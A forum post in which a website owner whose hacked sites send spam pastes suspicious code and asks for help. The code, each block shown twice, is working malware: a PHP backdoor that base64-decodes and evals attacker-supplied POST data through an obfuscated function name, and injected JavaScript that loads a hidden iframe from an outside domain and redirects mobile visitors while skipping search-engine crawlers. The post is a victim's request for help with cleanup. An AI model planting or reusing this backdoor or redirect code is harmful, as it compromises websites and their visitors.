Anyone got experience of malicious scripts?
Discussion
I have a couple of websites out there and a couple have been hacked and sending out millions of email spam messages. I found two php files that seemed to be the 'engines' of the hack but have also found some dubious looking code in some other files. Extract below. Seems very dodgy to me:
$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
$fv = $fnsdht($_POST["gjwqweodsa"]);
@eval($fv);
//@eval($_POST["gjwqweodsa"]);
}else{
$mpath = realpath("")."/";
//$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
}else{
echo "ERROR! CANT DO NOTHING!";
}
}
}
$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
$fv = $fnsdht($_POST["gjwqweodsa"]);
@eval($fv);
//@eval($_POST["gjwqweodsa"]);
}else{
$mpath = realpath("")."/";
//$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
}else{
echo "ERROR! CANT DO NOTHING!";
}
}
}
i don't have the full logs as it's third party hosted but i've also foud this in index.php:
echo "<script type=\"text/javascript\">
function sd5135GHEDF(agaga31323l) {
var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
if (typeof(melm) != \"undefined\" && melm!= null)
{}else{
var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
dsdSSSWrw515312FFF.style.width = \"10px\";
dsdSSSWrw515312FFF.style.height = \"10px\";
dsdSSSWrw515312FFF.style.border = \"0px\";
dsdSSSWrw515312FFF.frameBorder = \"0\";
dsdSSSWrw515312FFF.style.position = \"absolute\";
dsdSSSWrw515312FFF.style.left = \"-200\";
dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
document.body.appendChild(dsdSSSWrw515312FFF);
dsdSSSWrw515312FFF.src = agaga31323l;
return true;
}
}
function asd61234tkhjasd454hfhf235(){
sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");
}
function SFWR64362fdhHHHHH(){
if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();}
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
try{setTimeout(function(){window.location=\"http://novostivkontakte.ru/?id=mob\";},1000);}
catch(err) {window.location=\"http://novostivkontakte.ru/?id=mob\";location.href=\"http://novostivkontakte.ru/?id=mob\";}
}
}
//setTimeout(function(){R();},1500);
try {
if(window.attachEvent) {
window.attachEvent(\"onload\", SFWR64362fdhHHHHH);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
SFWR64362fdhHHHHH();
};
window.onload = newonload;
} else {
window.onload = SFWR64362fdhHHHHH;
}
}
} catch(err) {}
</script>";
echo "<script type=\"text/javascript\">
function sd5135GHEDF(agaga31323l) {
var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
if (typeof(melm) != \"undefined\" && melm!= null)
{}else{
var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
dsdSSSWrw515312FFF.style.width = \"10px\";
dsdSSSWrw515312FFF.style.height = \"10px\";
dsdSSSWrw515312FFF.style.border = \"0px\";
dsdSSSWrw515312FFF.frameBorder = \"0\";
dsdSSSWrw515312FFF.style.position = \"absolute\";
dsdSSSWrw515312FFF.style.left = \"-200\";
dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
document.body.appendChild(dsdSSSWrw515312FFF);
dsdSSSWrw515312FFF.src = agaga31323l;
return true;
}
}
function asd61234tkhjasd454hfhf235(){
sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");
}
function SFWR64362fdhHHHHH(){
if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();}
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
try{setTimeout(function(){window.location=\"http://novostivkontakte.ru/?id=mob\";},1000);}
catch(err) {window.location=\"http://novostivkontakte.ru/?id=mob\";location.href=\"http://novostivkontakte.ru/?id=mob\";}
}
}
//setTimeout(function(){R();},1500);
try {
if(window.attachEvent) {
window.attachEvent(\"onload\", SFWR64362fdhHHHHH);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
SFWR64362fdhHHHHH();
};
window.onload = newonload;
} else {
window.onload = SFWR64362fdhHHHHH;
}
}
} catch(err) {}
</script>";
Gassing Station | Computers, Gadgets & Stuff | Top of Page | What's New | My Stuff